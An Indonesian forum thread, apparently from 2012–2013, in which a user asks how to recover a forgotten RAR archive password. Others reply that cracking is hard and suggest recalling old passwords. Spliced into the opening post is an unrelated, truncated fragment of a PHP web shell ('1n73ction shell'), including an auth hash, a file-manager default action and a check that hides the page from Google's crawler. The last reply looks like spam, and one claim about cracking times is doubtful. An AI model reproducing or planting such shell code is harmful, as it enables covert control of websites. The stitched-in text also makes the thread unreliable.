Penulis Topik: lupa password rar  (Dibaca 3917 kali)

Offline alan_naufal

  • Pro100
  • ****
  • Tulisan: 135
  • Reputation: 202
    • Lihat Profil
    • 4ward antivirus official web
lupa password rar
« pada: Oktober 19, 2012, 07:31:32 PM »
waktu kemarin ane kasih password di file compreessan ane tapi lupa passwordnya. setelah ane googling katanya pake hex editor tapi ane gk dong caranya
<?php
/* (1n73ction shell v3.1 by x'1n73ct|default pass:" 1n73ction ") */
$auth_pass = "9c80a1eaca699e2fc6b994721f8703bc";
$color = "#00ff00";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
    header('HTTP/1.

Offline :Pak:Bos:

  • Pro500
  • ******
  • Tulisan: 868
  • Reputation: 22166
  • Jenis kelamin: Pria
  • mencari jatidiri..
    • Lihat Profil
Re: lupa password rar
« Jawab #1 pada: Oktober 20, 2012, 09:38:27 AM »
menjebol password rar sangat sulit..
meskipun bisa menggunakan hex editor, tetapi itu masih dalam keadaan enkripsi oleh winrar..
saya dulu juga mencoba-coba cari caranya, tetapi tetap tidak bisa..

mending ingat-ingat saja..
password yang biasanya agan gunakan apa?
mungkin tanggal lahir, nomor hp, nama pacar dll..

Offline MozaikTM

  • MoMod
  • Pro500
  • *****
  • Tulisan: 1.527
  • Reputation: 789
  • Jenis kelamin: Pria
  • ...
    • Lihat Profil
    • MozaikTM
Re: lupa password rar
« Jawab #2 pada: Oktober 20, 2012, 02:50:22 PM »
waktu kemarin ane kasih password di file compreessan ane tapi lupa passwordnya. setelah ane googling katanya pake hex editor tapi ane gk dong caranya
Makannya gan, klo bikin password itu pake rumus, ane juga gitu, klo mau bikin password di rumus dulu,.... 8) 8)

Atau klo bisa, passwordnya dibahasa inggriskan... ;) ;), kya ane juga.... 8)
Brain.EXE has stopped working. Error 0x00000007 (Out Of Memory).
Failed to Understand.

Offline PunyaNama

  • Pro200
  • *****
  • Tulisan: 321
  • Reputation: 357
  • Jenis kelamin: Pria
  • Butuh ilmu+cendol
    • Lihat Profil
Re: lupa password rar
« Jawab #3 pada: Oktober 20, 2012, 09:54:51 PM »
klo ane malah gak ngerti cara jebolnya. :P
ane mak jZip sih!( ;> ketauan klo kere ;> )
klo rar susaaaah klo jZip gimana nih? :-\
Masih newbie
Butuh ilmu
Butuh cendol
Pengen pinter
Ajarin ya?
Jangan galak-galak ya?
Atas hal-hal bermanfaat yang telah diberikan, ane ucapin"Terima Kasih"
Kalo ane ada salah mohon dimaafin yah? ^:)^
^_^ ^_^ ^_^ ^_^ ^_^ ^_^ ^_^ ^_^ ^_^ ^_^ ^_^ ^_^ ^_^ ^_^ ^_^ ^_^ ^_^ ^_^ ^_^ ^_^ ^_^

Offline ronie jack

  • Pro100
  • ****
  • Tulisan: 164
  • Reputation: 168
    • Lihat Profil
Re: lupa password rar
« Jawab #4 pada: Oktober 26, 2012, 06:28:07 AM »
thx

Offline I-I@b1b

  • Pro10
  • ***
  • Tulisan: 46
  • Reputation: 78
  • Jenis kelamin: Pria
  • Im IS HACKER and CRACKER
    • Lihat Profil
Re: lupa password rar
« Jawab #5 pada: Januari 06, 2013, 05:07:29 PM »
betul tuh, sulit mau jebol rar. klo mau jebol password ada software nya, taaapppiii nunggu lama untuk mendapatkan passwordnya...

Offline Frans Mangarahut Situmorang

  • Pro200
  • *****
  • Tulisan: 204
  • Reputation: 281
    • Lihat Profil
Re: lupa password rar
« Jawab #6 pada: Pebruari 21, 2013, 02:13:24 PM »
ada software yanng bisa membobol WinRar tapi masalahnya waktu..
bayangkan menjebol password WinRar yaitu "F4n5" bisa memakan waktu 2 sampai 3 tahun  ;D ;D
CMIIW
Tuhan menempatkanmu didunia ini bukan tuk membaca kisah orang lain, Tapi Tuhan menempatkanmu tuk melakukan sesuatu yang membuat orang lain ingin membaca kisahmu.

Offline cafayzieg

  • Pro3
  • **
  • Tulisan: 6
  • Reputation: 32
    • Lihat Profil
Re: lupa password rar
« Jawab #7 pada: Pebruari 26, 2013, 02:09:35 PM »
Ths. Semuanya akan menjadi lebih baik dan lebih baik. :-bd Info lebih lanjut.
« Edit Terakhir: Pebruari 26, 2013, 02:12:22 PM oleh cafayzieg »
A true friend does not take over and a true friend never tells you to lead you do it together.
Yeah. Do you think about the human and Iphone? I have found an interesting site.